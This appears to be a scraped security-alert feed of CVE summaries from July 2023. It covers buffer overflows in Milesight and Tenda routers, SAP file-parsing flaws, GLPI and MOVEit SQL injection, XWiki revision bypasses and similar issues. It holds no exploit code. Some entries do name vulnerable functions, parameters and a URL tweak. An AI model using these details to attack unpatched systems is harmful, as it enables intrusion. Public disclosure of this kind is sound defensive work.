🚨 CVE-2023-25121Multiple buffer overflow vulnerabilities exist in the vtysh_ubus binary of Milesight UR32L v32.3.0.5 due to the use of an unsafe sprintf pattern. A specially crafted HTTP request can lead to a buffer overflow. An attacker can send HTTP requests to trigger these vulnerabilities.This buffer overflow occurs in the set_ike_profile function with the secrets_local variable.🎖@cveNotify |
|
| 2023-07-11 17:58:27 |
🚨 CVE-2023-25112Multiple buffer overflow vulnerabilities exist in the vtysh_ubus binary of Milesight UR32L v32.3.0.5 due to the use of an unsafe sprintf pattern. A specially crafted HTTP request can lead to a buffer overflow. An attacker can send HTTP requests to trigger these vulnerabilities.This buffer overflow occurs in the set_l2tp function with the remote_subnet and the remote_mask variables.🎖@cveNotify |
|
| 2023-07-11 17:58:26 |
🚨 CVE-2023-25105Multiple buffer overflow vulnerabilities exist in the vtysh_ubus binary of Milesight UR32L v32.3.0.5 due to the use of an unsafe sprintf pattern. A specially crafted HTTP request can lead to a buffer overflow. An attacker can send HTTP requests to trigger these vulnerabilities.This buffer overflow occurs in the set_ike_profile function with the secrets_remote variable.🎖@cveNotify |
|
| 2023-07-11 17:58:24 |
🚨 CVE-2023-25104Multiple buffer overflow vulnerabilities exist in the vtysh_ubus binary of Milesight UR32L v32.3.0.5 due to the use of an unsafe sprintf pattern. A specially crafted HTTP request can lead to a buffer overflow. An attacker can send HTTP requests to trigger these vulnerabilities.This buffer overflow occurs in the set_ike_profile function with the username and the password variables.🎖@cveNotify |
|
| 2023-07-11 17:58:23 |
🚨 CVE-2023-25114Multiple buffer overflow vulnerabilities exist in the vtysh_ubus binary of Milesight UR32L v32.3.0.5 due to the use of an unsafe sprintf pattern. A specially crafted HTTP request can lead to a buffer overflow. An attacker can send HTTP requests to trigger these vulnerabilities.This buffer overflow occurs in the set_openvpn_client function with the expert_options variable.🎖@cveNotify |
|
| 2023-07-11 17:58:22 |
🚨 CVE-2023-25113Multiple buffer overflow vulnerabilities exist in the vtysh_ubus binary of Milesight UR32L v32.3.0.5 due to the use of an unsafe sprintf pattern. A specially crafted HTTP request can lead to a buffer overflow. An attacker can send HTTP requests to trigger these vulnerabilities.This buffer overflow occurs in the set_l2tp function with the key variable.🎖@cveNotify |
|
| 2023-07-11 17:58:21 |
🚨 CVE-2023-25117Multiple buffer overflow vulnerabilities exist in the vtysh_ubus binary of Milesight UR32L v32.3.0.5 due to the use of an unsafe sprintf pattern. A specially crafted HTTP request can lead to a buffer overflow. An attacker can send HTTP requests to trigger these vulnerabilities.This buffer overflow occurs in the set_openvpn_client function with the local_virtual_ip and the local_virtual_mask variables.🎖@cveNotify |
|
| 2023-07-11 17:58:20 |
🚨 CVE-2023-25116Multiple buffer overflow vulnerabilities exist in the vtysh_ubus binary of Milesight UR32L v32.3.0.5 due to the use of an unsafe sprintf pattern. A specially crafted HTTP request can lead to a buffer overflow. An attacker can send HTTP requests to trigger these vulnerabilities.This buffer overflow occurs in the set_openvpn_client function with the local_virtual_ip and the remote_virtual_ip variables.🎖@cveNotify |
|
| 2023-07-11 17:58:16 |
🚨 CVE-2023-25122Multiple buffer overflow vulnerabilities exist in the vtysh_ubus binary of Milesight UR32L v32.3.0.5 due to the use of an unsafe sprintf pattern. A specially crafted HTTP request can lead to a buffer overflow. An attacker can send HTTP requests to trigger these vulnerabilities.This buffer overflow occurs in the set_openvpn_client function with the old_remote_subnet and the old_remote_mask variables.🎖@cveNotify |
|
| 2023-07-11 17:58:15 |
🚨 CVE-2023-25115Multiple buffer overflow vulnerabilities exist in the vtysh_ubus binary of Milesight UR32L v32.3.0.5 due to the use of an unsafe sprintf pattern. A specially crafted HTTP request can lead to a buffer overflow. An attacker can send HTTP requests to trigger these vulnerabilities.This buffer overflow occurs in the set_openvpn_client function with the remote_ip and the port variables.🎖@cveNotify |
|
| 2023-07-11 17:58:14 |
🚨 CVE-2023-25123Multiple buffer overflow vulnerabilities exist in the vtysh_ubus binary of Milesight UR32L v32.3.0.5 due to the use of an unsafe sprintf pattern. A specially crafted HTTP request can lead to a buffer overflow. An attacker can send HTTP requests to trigger these vulnerabilities.This buffer overflow occurs in the set_openvpn_client function with the remote_subnet and the remote_mask variables when action is 2.🎖@cveNotify |
|
| 2023-07-11 17:58:13 |
🚨 CVE-2023-25119Multiple buffer overflow vulnerabilities exist in the vtysh_ubus binary of Milesight UR32L v32.3.0.5 due to the use of an unsafe sprintf pattern. A specially crafted HTTP request can lead to a buffer overflow. An attacker can send HTTP requests to trigger these vulnerabilities.This buffer overflow occurs in the set_pptp function with the remote_subnet and the remote_mask variables.🎖@cveNotify |
|
| 2023-07-11 10:58:23 |
🚨 CVE-2023-36925SAP Solution Manager (Diagnostics agent) - version 7.20, allows an unauthenticated attacker to blindly execute HTTP requests. On successful exploitation, the attacker can cause a limited impact on confidentiality and availability of the application and other applications the Diagnostics Agent can reach.🎖@cveNotify |
|
| 2023-07-11 06:58:45 |
🚨 CVE-2023-36925SAP Solution Manager (Diagnostics agent) - version 7.20, allows an unauthenticated attacker to blindly execute HTTP requests. On successful exploitation, the attacker can cause a limited impact on confidentiality and availability of the application and other applications the Diagnostics Agent can reach.🎖@cveNotify |
|
| 2023-07-11 06:58:43 |
🚨 CVE-2023-2079The "Buy Me a Coffee – Button and Widget Plugin" plugin for WordPress is vulnerable to Cross-Site Request Forgery due to missing nonce validation on the recieve_post, bmc_disconnect, name_post, and widget_post functions in versions up to, and including, 3.7. This makes it possible for unauthenticated attackers to update the plugins settings, via a forged request granted the attacker can trick a site's administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-07-11 06:58:42 |
🚨 CVE-2023-2078The "Buy Me a Coffee – Button and Widget Plugin" plugin for WordPress is vulnerable to unauthorized modification of data due to missing capability checks on the recieve_post, bmc_disconnect, name_post, and widget_post functions in versions up to, and including, 3.7. This makes it possible for authenticated attackers, with minimal permissions such as subscribers, to update the plugins settings. CVE-2023-25030 may be a duplicate of this issue.🎖@cveNotify |
|
| 2023-07-11 06:58:41 |
🚨 CVE-2023-33987An unauthenticated attacker in SAP Web Dispatcher - versions WEBDISP 7.49, WEBDISP 7.53, WEBDISP 7.54, WEBDISP 7.77, WEBDISP 7.81, WEBDISP 7.85, WEBDISP 7.88, WEBDISP 7.89, WEBDISP 7.90, KERNEL 7.49, KERNEL 7.53, KERNEL 7.54 KERNEL 7.77, KERNEL 7.81, KERNEL 7.85, KERNEL 7.88, KERNEL 7.89, KERNEL 7.90, KRNL64NUC 7.49, KRNL64UC 7.49, KRNL64UC 7.53, HDB 2.00, XS_ADVANCED_RUNTIME 1.00, SAP_EXTENDED_APP_SERVICES 1, can submit a malicious crafted request over a network to a front-end server which may, over several attempts, result in a back-end server confusing the boundaries of malicious and legitimate messages. This can result in the back-end server executing a malicious payload which can be used to read or modify information on the server or make it temporarily unavailable.🎖@cveNotify |
|
| 2023-07-11 06:58:40 |
🚨 CVE-2023-33988In SAP Enable Now - versions WPB_MANAGER 1.0, WPB_MANAGER_CE 10, WPB_MANAGER_HANA 10, ENABLE_NOW_CONSUMP_DEL 1704, the Content-Security-Policy and X-XSS-Protection response headers are not implemented, allowing an unauthenticated attacker to attempt reflected cross-site scripting, which could result in disclosure or modification of information.🎖@cveNotify |
|
| 2023-07-11 06:58:38 |
🚨 CVE-2023-33989An attacker with non-administrative authorizations in SAP NetWeaver (BI CONT ADD ON) - versions 707, 737, 747, 757, can exploit a directory traversal flaw to over-write system files. Data from confidential files cannot be read but potentially some OS files can be over-written leading to system compromise.🎖@cveNotify |
|
| 2023-07-11 06:58:37 |
🚨 CVE-2023-33990SAP SQL Anywhere - version 17.0, allows an attacker to prevent legitimate users from accessing the service by crashing the service. An attacker with low privileged account and access to the local system can write into the shared memory objects. This can be leveraged by an attacker to perform a Denial of Service. Further, an attacker might be able to modify sensitive data in shared memory objects.This issue only affects SAP SQL Anywhere on Windows. Other platforms are not impacted.🎖@cveNotify |
|
| 2023-07-11 06:58:36 |
🚨 CVE-2023-33992The SAP BW BICS communication layer in SAP Business Warehouse and SAP BW/4HANA - version SAP_BW 730, SAP_BW 731, SAP_BW 740, SAP_BW 730, SAP_BW 750, DW4CORE 100, DW4CORE 200, DW4CORE 300, may expose unauthorized cell values to the data response. To be able to exploit this, the user still needs authorizations on the query as well as on the keyfigure/measure level. The missing check only affects the data level.🎖@cveNotify |
|
| 2023-07-11 06:58:35 |
🚨 CVE-2023-35870When creating a journal entry template in SAP S/4HANA (Manage Journal Entry Template) - versions S4CORE 104, 105, 106, 107, an attacker could intercept the save request and change the template, leading to an impact on confidentiality and integrity of the resource. Furthermore, a standard template could be deleted, hence making the resource temporarily unavailable.🎖@cveNotify |
|
| 2023-07-11 06:58:33 |
🚨 CVE-2023-35871The SAP Web Dispatcher - versions WEBDISP 7.53, WEBDISP 7.54, WEBDISP 7.77, WEBDISP 7.85, WEBDISP 7.89, WEBDISP 7.91, WEBDISP 7.92, WEBDISP 7.93, KERNEL 7.53, KERNEL 7.54 KERNEL 7.77, KERNEL 7.85, KERNEL 7.89, KERNEL 7.91, KERNEL 7.92, KERNEL 7.93, KRNL64UC 7.53, HDB 2.00, XS_ADVANCED_RUNTIME 1.00, SAP_EXTENDED_APP_SERVICES 1, has a vulnerability that can be exploited by an unauthenticated attacker to cause memory corruption through logical errors in memory management this may leads to information disclosure or system crashes, which can have low impact on confidentiality and high impact on the integrity and availability of the system.🎖@cveNotify |
|
| 2023-07-11 06:58:32 |
🚨 CVE-2023-37189A stored cross site scripting (XSS) vulnerability in index.php?menu=billing_rates of Issabel PBX version 4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the Name or Prefix fields under the Create New Rate module.🎖@cveNotify |
|
| 2023-07-11 06:58:31 |
🚨 CVE-2023-37190A stored cross-site scripting (XSS) vulnerability in Issabel issabel-pbx v.4.0.0-6 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Virtual Fax Name and Caller ID Name parameters under the New Virtual Fax feature.🎖@cveNotify |
|
| 2023-07-11 06:58:30 |
🚨 CVE-2023-37191A stored cross-site scripting (XSS) vulnerability in Issabel issabel-pbx v.4.0.0-6 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Group and Description parameters.🎖@cveNotify |
|
| 2023-07-11 06:58:29 |
🚨 CVE-2023-35973Authenticated command injection vulnerabilities exist in the ArubaOS command line interface. Successful exploitation of these vulnerabilities result in the ability to execute arbitrary commands as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2023-07-11 06:58:28 |
🚨 CVE-2021-46891Vulnerability of incomplete read and write permission verification in the GPU module. Successful exploitation of this vulnerability may affect service confidentiality, integrity, and availability.🎖@cveNotify |
|
| 2023-07-11 06:58:27 |
🚨 CVE-2021-46890Vulnerability of incomplete read and write permission verification in the GPU module. Successful exploitation of this vulnerability may affect service confidentiality, integrity, and availability.🎖@cveNotify |
|
| 2023-07-11 06:58:25 |
🚨 CVE-2023-34107GLPI is a free asset and IT management software package. Versions of the software starting with 9.2.0 and prior to 10.0.8 have an incorrect rights check on a on a file accessible by an authenticated user, allows access to the view all KnowbaseItems. Version 10.0.8 has a patch for this issue.🎖@cveNotify |
|
| 2023-07-11 06:58:24 |
🚨 CVE-2023-34244GLPI is a free asset and IT management software package. Starting in version 9.4.0 and prior to version 10.0.8, a malicious link can be crafted by an unauthenticated user that can exploit a reflected XSS in case any authenticated user opens the crafted link. Users should upgrade to version 10.0.8 to receive a patch.🎖@cveNotify |
|
| 2023-07-11 06:58:23 |
🚨 CVE-2023-35924GLPI is a free asset and IT management software package. Starting in version 10.0.0 and prior to version 10.0.8, GLPI inventory endpoint can be used to drive a SQL injection attack. By default, GLPI inventory endpoint requires no authentication. Version 10.0.8 has a patch for this issue. As a workaround, one may disable native inventory.🎖@cveNotify |
|
| 2023-07-11 06:58:22 |
🚨 CVE-2023-35939GLPI is a free asset and IT management software package. Starting in version 9.5.0 and prior to version 10.0.8, an incorrect rights check on a on a file accessible by an authenticated user (or not for certain actions), allows a threat actor to interact, modify, or see Dashboard data. Version 10.0.8 contains a patch for this issue.🎖@cveNotify |
|
| 2023-07-11 00:58:18 |
🚨 CVE-2022-47927An issue was discovered in MediaWiki before 1.35.9, 1.36.x through 1.38.x before 1.38.5, and 1.39.x before 1.39.1. When installing with a pre-existing data directory that has weak permissions, the SQLite files are created with file mode 0644, i.e., world readable to local users. These files include credentials data.🎖@cveNotify |
|
| 2023-07-11 00:58:17 |
🚨 CVE-2023-24489A vulnerability has been discovered in the customer-managed ShareFile storage zones controller which, if exploited, could allow an unauthenticated attacker to remotely compromise the customer-managed ShareFile storage zones controller.🎖@cveNotify |
|
| 2023-07-11 00:58:14 |
🚨 CVE-2023-24490Users with only access to launch VDA applications can launch an unauthorized desktop🎖@cveNotify |
|
| 2023-07-11 00:58:13 |
🚨 CVE-2023-30960A security defect was discovered in Foundry job-tracker that enabled users to query metadata related to builds on resources they did not have access to. This defect was resolved with the release of job-tracker 4.645.0. The service was rolled out to all affected Foundry instances. No further intervention is required.🎖@cveNotify |
|
| 2023-07-11 00:58:12 |
🚨 CVE-2023-3608A vulnerability was found in Ruijie BCR810W 2.5.10. It has been rated as critical. This issue affects some unknown processing of the component Tracert Page. The manipulation leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-233477 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-10 22:58:38 |
🚨 CVE-2022-41186Due to lack of proper memory management, when a victim opens manipulated Computer Graphics Metafile (.cgm, CgmCore.dll) file received from untrusted sources in SAP 3D Visual Enterprise Viewer - version 9, a Remote Code Execution can be triggered when payload forces a stack-based overflow and or a re-use of dangling pointer which refers to overwritten space in memory.🎖@cveNotify |
|
| 2023-07-10 22:58:36 |
🚨 CVE-2022-41198Due to lack of proper memory management, when a victim opens a manipulated SketchUp (.skp, SketchUp.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Viewer - version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.🎖@cveNotify |
|
| 2023-07-10 22:58:35 |
🚨 CVE-2022-41202Due to lack of proper memory management, when a victim opens a manipulated Visual Design Stream (.vds, vds.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Viewer - version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.🎖@cveNotify |
|
| 2023-07-10 22:58:34 |
🚨 CVE-2022-41196Due to lack of proper memory management, when a victim opens a manipulated VRML Worlds (.wrl, vrml.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Viewer - version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.🎖@cveNotify |
|
| 2023-07-10 22:58:32 |
🚨 CVE-2022-41187Due to lack of proper memory management, when a victim opens a manipulated Wavefront Object (.obj, ObjTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Viewer - version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.🎖@cveNotify |
|
| 2023-07-10 22:58:31 |
🚨 CVE-2022-41200Due to lack of proper memory management, when a victim opens a manipulated Scalable Vector Graphic (.svg, svg.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Viewer - version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.🎖@cveNotify |
|
| 2023-07-10 22:58:30 |
🚨 CVE-2022-41185Due to lack of proper memory management, when a victim opens a manipulated Visual Design Stream (.vds, MataiPersistence.dll) file received from untrusted sources in SAP 3D Visual Enterprise Author - version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.🎖@cveNotify |
|
| 2023-07-10 22:58:28 |
🚨 CVE-2022-41193Due to lack of proper memory management, when a victim opens a manipulated Encapsulated Post Script (.eps, ai.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Viewer - version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.🎖@cveNotify |
|
| 2023-07-10 22:58:27 |
🚨 CVE-2022-41201Due to lack of proper memory management, when a victim opens a manipulated Right Hemisphere Binary (.rh, rh.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Viewer - version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.🎖@cveNotify |
|
| 2023-07-10 22:58:26 |
🚨 CVE-2022-41180Due to lack of proper memory management, when a victim opens a manipulated Portable Document Format (.pdf, PDFPublishing.dll) file received from untrusted sources in SAP 3D Visual Enterprise Author - version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.🎖@cveNotify |
|
| 2023-07-10 22:58:24 |
🚨 CVE-2022-41184Due to lack of proper memory management, when a victim opens a manipulated Windows Cursor File (.cur, ico.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Author - version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.🎖@cveNotify |
|
| 2023-07-10 22:58:23 |
🚨 CVE-2022-41191Due to lack of proper memory management, when a victim opens a manipulated Jupiter Tesselation (.jt, JTReader.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Viewer - version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.🎖@cveNotify |
|
| 2023-07-10 22:58:21 |
🚨 CVE-2022-41190Due to lack of proper memory management, when a victim opens a manipulated AutoCAD (.dxf, TeighaTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Viewer - version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.🎖@cveNotify |
|
| 2023-07-10 22:58:20 |
🚨 CVE-2022-41199Due to lack of proper memory management, when a victim opens a manipulated Open Inventor File (.iv, vrml.x3d) file received from untrusted sources in SAP 3D Visual Enterprise Viewer - version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.🎖@cveNotify |
|
| 2023-07-10 22:58:19 |
🚨 CVE-2023-30765?Delta Electronics InfraSuite Device Master versions prior to 1.0.7 contain improper access controls that could allow an attacker to alter privilege management configurations, resulting in privilege escalation.🎖@cveNotify |
|
| 2023-07-10 22:58:18 |
🚨 CVE-2023-34316?An attacker could bypass the latest Delta Electronics InfraSuite Device Master (versions prior to 1.0.7) patch, which could allow an attacker to retrieve file contents.🎖@cveNotify |
|
| 2023-07-10 22:58:16 |
🚨 CVE-2023-3605A vulnerability was found in PHPGurukul Online Shopping Portal 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component Registration Page. The manipulation leads to improper restriction of excessive authentication attempts. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-233467.🎖@cveNotify |
|
| 2023-07-10 22:58:15 |
🚨 CVE-2022-39805Due to lack of proper memory management, when a victim opens a manipulated Computer Graphics Metafile (.cgm, CgmTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Author - version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.🎖@cveNotify |
|
| 2023-07-10 22:58:14 |
🚨 CVE-2022-41167Due to lack of proper memory management, when a victim opens a manipulated AutoCAD (.dwg, TeighaTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Author - version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.🎖@cveNotify |
|
| 2023-07-10 22:58:13 |
🚨 CVE-2022-39808Due to lack of proper memory management, when a victim opens a manipulated Wavefront Object (.obj, ObjTranslator.exe) file received from untrusted sources in SAP 3D Visual Enterprise Author - version 9, it is possible that a Remote Code Execution can be triggered when payload forces a stack-based overflow or a re-use of dangling pointer which refers to overwritten space in memory.🎖@cveNotify |
|
| 2023-07-10 21:58:44 |
🚨 CVE-2023-34347?Delta Electronics InfraSuite Device Master versions prior to 1.0.7 contains classes that cannot be deserialized, which could allow an attack to remotely execute arbitrary code. 🎖@cveNotify |
|
| 2023-07-10 21:58:43 |
🚨 CVE-2022-22529SAP Enterprise Threat Detection (ETD) - version 2.0, does not sufficiently encode user-controlled inputs which may lead to an unauthorized attacker possibly exploit XSS vulnerability. The UIs in ETD are using SAP UI5 standard controls, the UI5 framework provides automated output encoding for its standard controls. This output encoding prevents stored malicious user input from being executed when it is reflected in the UI.🎖@cveNotify |
|
| 2023-07-10 21:58:40 |
🚨 CVE-2022-22530The F0743 Create Single Payment application of SAP S/4HANA - versions 100, 101, 102, 103, 104, 105, 106, does not check uploaded or downloaded files. This allows an attacker with basic user rights to inject dangerous content or malicious code which could result in critical information being modified or completely compromise the availability of the application.🎖@cveNotify |
|
| 2023-07-10 21:58:39 |
🚨 CVE-2022-22531The F0743 Create Single Payment application of SAP S/4HANA - versions 100, 101, 102, 103, 104, 105, 106, does not check uploaded or downloaded files. This allows an attacker with basic user rights to run arbitrary script code, resulting in sensitive information being disclosed or modified.🎖@cveNotify |
|
| 2023-07-10 21:58:38 |
🚨 CVE-2021-3759A memory overflow vulnerability was found in the Linux kernel’s ipc functionality of the memcg subsystem, in the way a user calls the semget function multiple times, creating semaphores. This flaw allows a local user to starve the resources, causing a denial of service. The highest threat from this vulnerability is to system availability.🎖@cveNotify |
|
| 2023-07-10 21:58:37 |
🚨 CVE-2021-3810code-server is vulnerable to Inefficient Regular Expression Complexity🎖@cveNotify |
|
| 2023-07-10 21:58:34 |
🚨 CVE-2021-3804taro is vulnerable to Inefficient Regular Expression Complexity🎖@cveNotify |
|
| 2023-07-10 21:58:33 |
🚨 CVE-2023-26299A potential Time-of-Check to Time-of-Use (TOCTOU) vulnerability has been identified in certain HP PC products using AMI UEFI Firmware (system BIOS), which might allow arbitrary code execution. AMI has released updates to mitigate the potential vulnerability.🎖@cveNotify |
|
| 2023-07-10 21:58:32 |
🚨 CVE-2023-2846Authentication Bypass by Capture-replay vulnerability in Mitsubishi Electric Corporation MELSEC iQ-F Series main modules allows a remote unauthenticated attacker to cancel the password/keyword setting and login to the affected products by sending specially crafted packets.🎖@cveNotify |
|
| 2023-07-10 18:58:39 |
🚨 CVE-2023-37701Tenda FH1203 V2.0.1.6 was discovered to contain a stack overflow via the deviceId parameter in the addWifiMacFilter function.🎖@cveNotify |
|
| 2023-07-10 18:58:38 |
🚨 CVE-2023-37702Tenda FH1203 V2.0.1.6 was discovered to contain a stack overflow via the deviceId parameter in the formSetDeviceName function.🎖@cveNotify |
|
| 2023-07-10 18:58:37 |
🚨 CVE-2023-37704Tenda FH1203 V2.0.1.6 was discovered to contain a stack overflow via the deviceId parameter in the formSetClientState function.🎖@cveNotify |
|
| 2023-07-10 18:58:36 |
🚨 CVE-2023-37705Tenda FH1203 V2.0.1.6 was discovered to contain a stack overflow via the page parameter in the fromAddressNat function.🎖@cveNotify |
|
| 2023-07-10 18:58:32 |
🚨 CVE-2023-37707Tenda FH1203 V2.0.1.6 was discovered to contain a stack overflow via the page parameter in the fromVirtualSer function.🎖@cveNotify |
|
| 2023-07-10 18:58:31 |
🚨 CVE-2023-37711Tenda AC1206 V15.03.06.23 and AC10 V15.03.06.47 were discovered to contain a stack overflow in the deviceId parameter in the saveParentControlInfo function.🎖@cveNotify |
|
| 2023-07-10 18:58:30 |
🚨 CVE-2023-37712Tenda AC1206 V15.03.06.23, F1202 V1.2.0.20(408), and FH1202 V1.2.0.20(408) were discovered to contain a stack overflow in the page parameter in the fromSetIpBind function.🎖@cveNotify |
|
| 2023-07-10 18:58:26 |
🚨 CVE-2022-42175Insecure Direct Object Reference vulnerability in WHMCS module SolusVM 1 4.1.2 allows an attacker to change the password and hostname of other customer servers without authorization.🎖@cveNotify |
|
| 2023-07-10 18:58:25 |
🚨 CVE-2023-3503A vulnerability has been found in SourceCodester Shopping Website 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file insert-product.php. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-232951.🎖@cveNotify |
|
| 2023-07-10 18:58:24 |
🚨 CVE-2023-21633Memory Corruption in Linux while processing QcRilRequestImsRegisterMultiIdentityMessage request.🎖@cveNotify |
|
| 2023-07-10 18:58:20 |
🚨 CVE-2023-21629Memory Corruption in Modem due to double free while parsing the PKCS15 sim files.🎖@cveNotify |
|
| 2023-07-10 18:58:19 |
🚨 CVE-2023-368162FA is a Web app to manage Two-Factor Authentication (2FA) accounts and generate their security codes. Cross site scripting (XSS) injection can be done via the account/service field. This was tested in docker-compose environment. This vulnerability has been patched in version 4.0.3.🎖@cveNotify |
|
| 2023-07-10 18:58:18 |
🚨 CVE-2023-21624Information disclosure in DSP Services while loading dynamic module.🎖@cveNotify |
|
| 2023-07-10 16:58:19 |
🚨 CVE-2023-36468XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. When an XWiki installation is upgraded and that upgrade contains a fix for a bug in a document, just a new version of that document is added. In some cases, it's still possible to exploit the vulnerability that was fixed in the new version. The severity of this depends on the fixed vulnerability, for the purpose of this advisory take CVE-2022-36100/GHSA-2g5c-228j-p52x as example - it is easily exploitable with just view rights and critical. When XWiki is upgraded from a version before the fix for it (e.g., 14.3) to a version including the fix (e.g., 14.4), the vulnerability can still be reproduced by adding `rev=1.1` to the URL used in the reproduction steps so remote code execution is possible even after upgrading. Therefore, this affects the confidentiality, integrity and availability of the whole XWiki installation. This vulnerability also affects manually added script macros that contained security vulnerabilities that were later fixed by changing the script macro without deleting the versions with the security vulnerability from the history. This vulnerability doesn't affect freshly installed versions of XWiki. Further, this vulnerability doesn't affect content that is only loaded from the current version of a document like the code of wiki macros or UI extensions. This vulnerability has been patched in XWiki 14.10.7 and 15.2RC1 by forcing old revisions to be executed in a restricted mode that disables all script macros. As a workaround, admins can manually delete old revisions of affected documents. A script could be used to identify all installed documents and delete the history for them. However, also manually added and later corrected code may be affected by this vulnerability so it is easy to miss documents.🎖@cveNotify |
|
| 2023-07-10 16:58:18 |
🚨 CVE-2023-30586A privilege escalation vulnerability exists in Node.js 20 that allowed loading arbitrary OpenSSL engines when the experimental permission model is enabled, which can bypass and/or disable the permission model. The attack complexity is high. However, the crypto.setEngine() API can be used to bypass the permission model when called with a compatible OpenSSL engine. The OpenSSL engine can, for example, disable the permission model in the host process by manipulating the process's stack memory to locate the permission model Permission::enabled_ in the host process's heap memory. Please note that at the time this CVE was issued, the permission model is an experimental feature of Node.js.🎖@cveNotify |
|
| 2023-07-10 14:58:26 |
🚨 CVE-2023-36934In Progress MOVEit Transfer before 2020.1.11 (12.1.11), 2021.0.9 (13.0.9), 2021.1.7 (13.1.7), 2022.0.7 (14.0.7), 2022.1.8 (14.1.8), and 2023.0.4 (15.0.4), a SQL injection vulnerability has been identified in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access to the MOVEit Transfer database. An attacker could submit a crafted payload to a MOVEit Transfer application endpoint that could result in modification and disclosure of MOVEit database content.🎖@cveNotify |
|
| 2023-07-10 14:58:25 |
🚨 CVE-2023-36539Exposure of information intended to be encrypted by some Zoom clients may lead to disclosure of sensitive information.🎖@cveNotify |
|
| 2023-07-10 14:58:24 |
🚨 CVE-2023-36291Cross Site Scripting vulnerability in Maxsite CMS v.108.7 allows a remote attacker to execute arbitrary code via the f_content parameter in the admin/page_new file.🎖@cveNotify |
|
| 2023-07-10 14:58:23 |
🚨 CVE-2023-35938 Tuleap is a Free & Open Source Suite to improve management of software developments and collaboration. When switching from a project visibility that allows restricted users to `Private without restricted`, restricted users that are project administrators keep this access right. Restricted users that were project administrators before the visibility switch keep the possibility to access the project and do some administration actions. This issue has been resolved in Tuleap version 14.9.99.63. Users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2023-07-10 14:58:22 |
🚨 CVE-2023-34736Guantang Equipment Management System version 4.12 is vulnerable to Arbitrary File Upload.🎖@cveNotify |
|
| 2023-07-10 10:58:12 |
🚨 CVE-2023-37288SmartBPM.NET component has a vulnerability of path traversal within its file download function. An unauthenticated remote attacker can exploit this vulnerability to access arbitrary system files.🎖@cveNotify |
|
| 2023-07-10 05:59:06 |
🚨 CVE-2023-20771In display, there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07671046; Issue ID: ALPS07671046.🎖@cveNotify |
|
| 2023-07-10 05:59:02 |
🚨 CVE-2023-20772In vow, there is a possible escalation of privilege due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07441796; Issue ID: ALPS07441796.🎖@cveNotify |
|
| 2023-07-10 05:59:01 |
🚨 CVE-2023-20774In display, there is a possible out of bounds read due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07292228; Issue ID: ALPS07292228.🎖@cveNotify |
|
| 2023-07-10 05:59:00 |
🚨 CVE-2023-20766In gps, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07573237; Issue ID: ALPS07573202.🎖@cveNotify |
|
| 2023-07-10 05:58:56 |
